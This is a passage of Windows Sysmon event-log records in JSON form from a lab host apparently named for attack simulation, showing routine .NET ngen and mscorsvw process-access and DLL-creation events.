05:59:45.434","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D1-5F25-0000-001057131100}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7628,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:45.653\r\nProcessGuid: {A837DB8D-04D1-5F25-0000-001057131100}\r\nProcessId: 4848\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12f0-0\\System.Runtime.Serialization.Formatters.Soap.dll\r\nCreationUtcTime: 2020-08-01 05:59:45.653","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:45.653","ProcessGuid":"{A837DB8D-04D1-5F25-0000-001057131100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12f0-0\\System.Runtime.Serialization.Formatters.Soap.dll","CreationUtcTime":"2020-08-01 05:59:45.653","EventReceivedTime":"2020-08-01 05:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7629,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:45.684\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D1-5F25-0000-0010EE161100}\r\nTargetProcessId: 3004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:45.684","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D1-5F25-0000-0010EE161100}","TargetProcessId":"3004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7630,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:45.684\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D1-5F25-0000-0010EE161100}\r\nTargetProcessId: 3004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:45.684","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D1-5F25-0000-0010EE161100}","TargetProcessId":"3004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7631,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:45.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D1-5F25-0000-0010EE161100}\r\nTargetProcessId: 3004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:45.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D1-5F25-0000-0010EE161100}","TargetProcessId":"3004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7632,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:45.731\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D1-5F25-0000-0010131A1100}\r\nTargetProcessId: 1196\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:45.731","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D1-5F25-0000-0010131A1100}","TargetProcessId":"1196","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7633,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:45.731\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D1-5F25-0000-0010131A1100}\r\nTargetProcessId: 1196\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:45.731","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D1-5F25-0000-0010131A1100}","TargetProcessId":"1196","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7634,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:45.746\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D1-5F25-0000-0010131A1100}\r\nTargetProcessId: 1196\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:45.746","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D1-5F25-0000-0010131A1100}","TargetProcessId":"1196","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7635,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:46.278\r\nProcessGuid: {A837DB8D-04D1-5F25-0000-0010131A1100}\r\nProcessId: 1196\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\4ac-0\\System.Security.dll\r\nCreationUtcTime: 2020-08-01 05:59:46.278","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:46.278","ProcessGuid":"{A837DB8D-04D1-5F25-0000-0010131A1100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\4ac-0\\System.Security.dll","CreationUtcTime":"2020-08-01 05:59:46.278","EventReceivedTime":"2020-08-01 05:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7636,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:46.325\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04A9-5F25-0000-001026FE0F00}\r\nTargetProcessId: 2772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 